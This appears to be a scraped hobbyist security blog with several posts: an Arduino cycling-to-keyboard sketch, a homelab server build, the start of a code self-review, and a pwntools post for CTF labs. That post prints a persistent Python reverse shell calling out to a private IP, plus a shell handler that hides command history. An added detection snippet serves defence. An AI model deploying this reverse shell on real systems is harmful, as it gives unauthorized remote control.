<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">volatile unsigned long currentTriggerTime = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">volatile unsigned long triggerInterval = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">volatile int lastTriggerValue = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">volatile int triggerValue = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">const int trigger = 12;               // DeskCycle switch wire; the other wire goes to GND</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">volatile float cadence = 0;           // pedal revolutions per minute</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">volatile float currentSpeed = 0;      // miles per hour</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">void setup() {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  pinMode(trigger, INPUT_PULLUP);     // switch pulls the pin LOW when it closes</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  Keyboard.begin();</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  // Timer1 (16-bit on the Leonardo's ATmega32U4) in CTC mode, interrupting at 2 kHz</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  cli();                              // stop interrupts while configuring</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  TCCR1A = 0;                         // clear TCCR1A</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  TCCR1B = 0;                         // clear TCCR1B</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  TCNT1 = 0;                          // initialize counter value to 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  OCR1A = 124;                        // = (16*10^6) / (2000*64) - 1 (must be < 65536)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  TCCR1B |= (1 << WGM12);             // CTC mode, TOP = OCR1A</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  TCCR1B |= (1 << CS11) | (1 << CS10); // prescaler 64</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  TIMSK1 |= (1 << OCIE1A);            // enable the compare match A interrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  sei();                              // allow interrupts</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  lastTriggerTime = millis();</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">}//end setup</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">// Runs 2000 times a second: samples the switch and updates cadence and speed.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">ISR(TIMER1_COMPA_vect) {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  triggerValue = digitalRead(trigger);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  triggerValue = triggerValue == 0 ? 1 : 0;  // pull-up: LOW means the switch is closed</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  currentTriggerTime = millis();</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  triggerInterval = currentTriggerTime - lastTriggerTime;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  if (triggerInterval >= 2000) {             // no revolution for 2 seconds: stopped</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">    cadence = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">    currentSpeed = 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  }</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  if (lastTriggerValue != triggerValue) {    // switch changed state</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">    lastTriggerValue = triggerValue;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">    if (triggerValue == 1 && triggerInterval > 0) {  // switch just closed: one revolution</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">      lastTriggerTime = currentTriggerTime;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">      cadence = 60000.0 / triggerInterval;   // ms per revolution -> revolutions per minute</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">      float rph = cadence * 60;              // pedal revolutions per hour</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">      float wheelRph = rph * gearRatio;      // wheel revolutions per hour</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">      float inchesPerHour = wheelCircumference * wheelRph;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">      currentSpeed = inchesPerHour / inchesPerMile;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">    }</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  }</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">void loop() {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  // Copy the shared value with interrupts off so the ISR cannot change it mid-read.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  noInterrupts();</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  float speed = currentSpeed;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  interrupts();</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  // Not checking whether w is already pressed; repeated press() calls cause no issue.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  if (speed > 0) {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">    Keyboard.press('w');</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  }</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  else {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">    Keyboard.releaseAll();</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">  }</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">}</span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">I removed serial output stuff since it wasn’t needed. I only care about the speed.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">If speed is higher than 0, then keep pressing w, else release all the keys. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">If there hasn’t been a cycle/revolution in more than 2 seconds, speed is set to 0.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">What else can you do? You can add an if or switch statement based on the speed and press the Shift key (some games let you sprint with it), change LED colors, and so on. (For changing LEDs on the thotcon 0x8 badge, these should help: </span><a href="https://gist.github.com/gigawatts/a7e4b440b29895fd15d8c6f00d41852e" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://gist.github.com/gigawatts/a7e4b440b29895fd15d8c6f00d41852e</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> and </span><a href="https://github.com/FastLED/FastLED/wiki/Basic-usage" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://github.com/FastLED/FastLED/wiki/Basic-usage</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.) I assume you could also do something with Google Street View. </span></div>
<br /></span><br />
<b>Using pwntools for reverse shell handling and automation</b> (2018-12-28)<br />
<b>Introduction:</b><br />
I've been working with machines on HackTheBox and VMs from Vulnhub for a while, and I got annoyed with typing the same commands again and again. I decided to use pwntools (a Python library that provides a lot of functions for CTF and exploit dev usage, https://github.com/Gallopsled/pwntools) to handle the reverse shell and send commands. This is nothing new; I'm sure there are people and tools out there that automate some things after a machine is popped.<br />
<br />
For HTB and Vulnhub VM's I'm trying to avoid using tools such as metasploit, meterpreter, or anything that does everything and instead try to write my own tools and modify exploits. However, I do use nmap and enumeration tools/scripts...<br />
<br />
<b>Setup:</b><br />
The reverse shells I get may come from a custom Python script, PHP code, or a binary exploit. If it's a custom Python script, I can add whatever I want the script to do before it connects back to me, but for a shell from PHP or an exploit, I have to send the commands after I get the reverse connection.<br />
<br />
This is what I have as my handler: <br />
<br />
<pre>
from pwn import *

l = listen(80)              # listen for the reverse shell on port 80
l.wait_for_connection()     # block until the target connects back
# upgrade to a pty and set up the terminal
l.sendline(""" python -c 'import pty; pty.spawn("/bin/bash")'""")
l.sendline(" export SHELL=bash")
l.sendline(" export HISTFILE=/dev/null")
l.sendline(" export TERM=xterm")
l.sendline(" stty rows 38 columns 116")
l.sendline(""" alias ls='ls -lha --color=auto'""")
# initial enumeration
l.sendline("hostname")
l.sendline("whoami")
l.sendline("uname -a")
l.sendline("ps aux")
l.interactive()             # hand the shell over to me
</pre>
<div>
<br /></div>
<div>
It listens on port 80 and as soon as there is a reverse shell, it executes commands. l.interactive() gives you a shell.<br />
I change it depending on the situation. For one of the HTB machines, I had lines added to log in as one of the privileged users. You can also add commands in here to automatically download enumeration or privesc tools and execute them. <br />
<br />
Another common problem I've had is losing the shell. This typically happens because I pressed Ctrl+C after running a command I shouldn't have or didn't need to. I decided to modify my Python reverse shell to run in an infinite loop, sleeping between attempts when disconnected. This was fine for a while, but I didn't want my reverse shell running on shared HTB machines all the time if I happened to stop working on the machine or got disconnected and my IP changed. So I changed the script and added a counter: if it can't connect to me for a while, the process ends.<br />
<br />
Here's what the reverse shell looks like:<br />
<br />
<pre>
import socket, subprocess, os, time

counter = 0          # consecutive failed connection attempts
while counter &lt; 6:  # give up after six failures in a row (about 30 s)
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("10.0.0.63", 80))
        # point stdin/stdout/stderr at the socket so bash talks over it
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        counter = 0  # connected, so reset the failure count
        subprocess.call(["/bin/bash", "-i"])
    except:          # refused, reset, or any other error counts as a failure
        counter = counter + 1
        time.sleep(5)
        continue
</pre>
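Added as a defender-side example (not part of the original post): a small Python check for the trace the reverse shell above leaves on the host. After the three os.dup2() calls, fds 0, 1 and 2 of the process all resolve to the same socket inode, which is visible under /proc/PID/fd. The /proc layout and the socket:[inode] link format are Linux specifics, and the fd maps in the block are constructed samples.

```python
import os

SOCKET_PREFIX = "socket:["


def stdio_on_one_socket(fd_targets):
    """True when fds 0, 1 and 2 all resolve to the same socket inode.

    fd_targets maps fd number to the readlink() target of /proc/PID/fd/N, e.g.
    {0: "socket:[41023]", 1: "socket:[41023]", 2: "socket:[41023]"}, which is
    exactly what the three os.dup2(s.fileno(), N) calls leave behind.
    """
    targets = [fd_targets.get(fd) for fd in (0, 1, 2)]
    if not all(isinstance(t, str) and t.startswith(SOCKET_PREFIX) for t in targets):
        return False  # a pty, a pipe or a missing fd is not this pattern
    return len(set(targets)) == 1


def read_stdio_targets(pid, proc_root="/proc"):
    """Link targets of fds 0-2 for one pid; unreadable fds are left out."""
    out = {}
    for fd in (0, 1, 2):
        try:
            out[fd] = os.readlink(os.path.join(proc_root, str(pid), "fd", str(fd)))
        except OSError:
            pass  # process exited, or it belongs to another user and we are not root
    return out


def read_comm(pid, proc_root="/proc"):
    """Process name from /proc/PID/comm, or '?' if it cannot be read."""
    try:
        with open(os.path.join(proc_root, str(pid), "comm")) as f:
            return f.read().strip()
    except OSError:
        return "?"


def find_socket_backed_shells(proc_root="/proc"):
    """Return [(pid, comm, socket link)] for every process whose stdio is one socket.

    After the pty upgrade (python -c 'import pty; pty.spawn("/bin/bash")') the
    bash child sits on a pty, but its python parent keeps the socket on 0-2,
    so the parent is still caught here. Socket-activated services (xinetd,
    systemd StandardInput=socket) produce the same layout, so review comm and
    the parent process before acting on a hit.
    """
    hits = []
    try:
        entries = os.listdir(proc_root)
    except OSError:
        return hits  # not Linux, or proc_root does not exist
    for entry in entries:
        if not entry.isdigit():
            continue
        targets = read_stdio_targets(entry, proc_root)
        if stdio_on_one_socket(targets):
            hits.append((int(entry), read_comm(entry, proc_root), targets[0]))
    return hits


if __name__ == "__main__":
    # Constructed fd layouts (not captured from a real host)
    samples = {
        "dup2'd socket (reverse shell)": {0: "socket:[41023]", 1: "socket:[41023]", 2: "socket:[41023]"},
        "interactive shell on a pty": {0: "/dev/pts/3", 1: "/dev/pts/3", 2: "/dev/pts/3"},
        "two different sockets": {0: "socket:[41023]", 1: "socket:[41023]", 2: "socket:[99]"},
    }
    for label, fds in samples.items():
        print("%-32s %s" % (label, stdio_on_one_socket(fds)))
    for pid, comm, link in find_socket_backed_shells():
        print("live: pid=%d comm=%s %s" % (pid, comm, link))
```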
<br />
<br />
<b>Resources:</b><br />
https://github.com/Gallopsled/pwntools</div>
<b>Virtualization server setup</b> (2018-12-21)<br />
This post is about how I have my virtualization server set up at home. I built it earlier this year. <div>
<br /></div>
<div>
Use cases for me are: running VM's, malware analysis, pentesting practice, processing data/logs, doing CTF stuff, running containers, virtualized networking, and so on...</div>
<div>
<br /></div>
<div>
<b>CPU</b>: AMD Ryzen 5 1600, it's 6 cores and 12 threads. It's cheap and good enough. </div>
<div>
<b>Motherboard</b>: B350M Mortar</div>
<div>
<b>RAM</b>: 4x8GB, total 32GB. It's good enough for running multiple VM's and containers. I had 16GB before and it worked fine.</div>
<div>
<b>Networking</b>: The motherboard has onboard 1GB Ethernet. For the connection to a NAS, I added a 10GB Mellanox NIC; a pair of those should cost around 30 bucks on eBay. Finally, I added a 4x1GB Ethernet NIC, which I think is sold by Syba on Amazon.</div>
<div>
<b>Case</b>: Thermaltake Versa H17</div>
<div>
<b>Storage</b>: 2x2TB HDD, 1x240GB SSD</div>
<div>
<br /></div>
<div>
<b>Virtualization setup</b>: I'm using Proxmox VE for virtualization. It supports VM's and Containers. On top of that, I'm using Docker as well. ServeTheHome has an article on how to set it up: <a href="https://www.servethehome.com/creating-the-ultimate-virtualization-and-container-setup-with-management-guis/">https://www.servethehome.com/creating-the-ultimate-virtualization-and-container-setup-with-management-guis/</a></div>
<div>
<br /></div>
<div>
The 2x2TB drives are set up in RAID 1, and Proxmox VE is installed on top of them. The SSD holds ISO images for Linux, Windows, etc., as well as the container images. All VM disks are stored on the HDDs. Additionally, all the data can be backed up over the 10GB link to the NAS. </div>
<div>
<br /></div>
<div>
Proxmox VE also lets you create templates from VMs. In my case, I have templates for Windows and Ubuntu Server with tools such as git and python preinstalled. </div>
<div>
<br /></div>
<div>
For networking, Proxmox VE lets you use OpenVSwitch right from the WebUI. It lets you create virtualized networks just for VMs or use one of the hardware ports. This comes in very handy when doing malware analysis. For example, you can set up pfSense as a VM and attach it to a virtualized network, then put the VM you're analyzing malware on into that same network. pfSense can be configured to route all the traffic through a VPN, so any malware traffic leaving that network goes out through the VPN. </div>
<div>
<br /></div>
<div>
Here's what the virtualization machine looks like on the inside:</div>
<div>
<img height="313" src="https://lh6.googleusercontent.com/IQTAVjS_r9YAY93V8ezddRiG-UTCH01lTWlRq2PbD-ctkW--AYJ5QyR8ZEVbI_cR_XtH7QjkBkk03lv8fjgH72-MVw5ehDRmj-7gVBEOvyqBwtP1SdlkZ_JP-uFFt_lS_MF6y65l" style="border: none; transform: rotate(0rad);" width="400" /></div>
<div>
<br /></div>
<div>
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Here's the back:</span></span></div>
<div>
<img height="400" src="https://lh5.googleusercontent.com/HtHKa4-eLBpxK12JB0VihWRzIIUIcW7caShAPLoiisQCQybVCI8foKtweILgMnbMmt4JZhAbVYXXZ5kxuqTg-Gjmrg4-NMPSrwOkbwC_XbFAuLUP6_cFSy-Jtbt8TUwGyk5Rvte0" style="border: none; transform: rotate(0rad);" width="256" /></div>
<div>
<br /></div>
<div>
Links:</div>
<div>
Proxmox VE: https://www.proxmox.com/en/proxmox-ve</div>
<div>
ServeTheHome - a really useful website: https://www.servethehome.com/</div>
<div>
Pfsense: https://www.pfsense.org/</div>
<div>
Opnsense (similar to pfsense): https://opnsense.org/</div>
<div>
Homelab subreddit, useful for looking at other setups and asking questions: https://www.reddit.com/r/homelab</div>
<b>Doing vulnerability assessment of my own code... It's bad.</b> (2018-12-18)<br />
<b>Introduction:</b><br />
I took the "Application Security: for Hackers and Developers" class at Derbycon this year. More about the course is here: <a href="https://www.vdalabs.com/expert-training/security-training-courses/security-for-hackers-and-developers/">https://www.vdalabs.com/expert-training/security-training-courses/security-for-hackers-and-developers/</a>. Videos are also available on PluralSight. Anyways, the class is focused on searching for vulnerabilities using various methods such as static analysis, dynamic analysis, binary analysis, fuzzing, etc.<br />
<br />
For a class I was taking this semester, I decided to write my final paper on different techniques used to review code and/or find security issues. I also decided to look at a project I worked on a long time ago for the hands-on part.<br />
<br />
The project is runthelabs (can be found here: <a href="https://github.com/BoredHackerBlog/runthelabs">https://github.com/BoredHackerBlog/runthelabs</a>). It is a Python+Flask based web app that takes in a JSON configuration file and creates a virtual environment. It uses Minimega (<a href="http://minimega.org/">minimega.org</a>), KVM, OpenVSwitch, and NoVNC. It also uses SQLite for holding data.<br />
<br />
The point of it is that a teacher creates a JSON file with virtual environment specifications, uploads it, and starts the lab. The teacher can copy and send NoVNC links to students/groups so they can VNC into a VM and work on whatever. More info here: <a href="https://github.com/BoredHackerBlog/runthelabs/tree/master/documentation">https://github.com/BoredHackerBlog/runthelabs/tree/master/documentation</a><br />
<br />
When I put the project on Github, I knew it could have some kind of injection vulnerability. The code was written so long ago and I never got to updating everything. (laziness is not good for security)<br />
<br />
<b>Goal/Testing Purpose and Scope:</b><br />
The goal of this testing is to apply code review and security testing techniques and find security issues in my project. The scope is just my application/code. Third-party code or issues related to Minimega, KVM, OpenVSwitch, etc. are not a concern.<br />
<br />
<b>Software Internals:</b><br />
api.py is the main flask app. There is a webUI and an API way of interacting with the app.<br />
config.py stores config information (paths to files and etc...)<br />
dbcontrol.py is responsible for interacting with the SQLite DB.<br />
mmcontrol.py is responsible for executing commands in relation to minimega, iptables, and openvswitch.<br />
mmstart.py parses JSON file uploaded by the admin and uses mmcontrol to set things up.<br />
<br />
There are two user roles: admin, and student/unauthenticated.<br />
<br />
Here's what the admin does: uploads a JSON config file and starts the lab (which turns on the VMs and sets up networking). Optionally, the admin can turn the whole lab off, reboot a VM, change a VNC password, and finally share the NoVNC link with a student.<br />
<br />
VNC can be accessed via RealVNC or other VNC software with the correct port and password, or via NoVNC.<br />
<br />
Unauthenticated users can check the server status (whether it's up or not; not very useful) and access VMs via VNC if they have the URL or the port and password.<br />
<br />
The software uses SQLite DB to keep track of VM name, password, and port.<br />
<br />
Port 1337 is used for WebUI and API. Port 1338 is used for Websockify/NoVNC.<br />
<br /><b>Testing Setup:</b><br />
To set up a testing environment, I needed one server to run the web app and two machines: one for static analysis/dynamic analysis/hacking and the other for the Admin/Teacher role.<br />
<br />
<b>Static Analysis:</b><br />
Static analysis is analyzing the code without running it. Here are useful OWASP links: <a href="https://www.owasp.org/index.php/Static_Code_Analysis">https://www.owasp.org/index.php/Static_Code_Analysis</a> & <a href="https://www.owasp.org/index.php/Source_Code_Analysis_Tools">https://www.owasp.org/index.php/Source_Code_Analysis_Tools</a><br />
<br />
I started by using bandit (<a href="https://github.com/PyCQA/bandit">https://github.com/PyCQA/bandit</a>) to scan my code. Here are some of the issues:<br />
<br />
<ul>
<li>Subprocess module is in use</li>
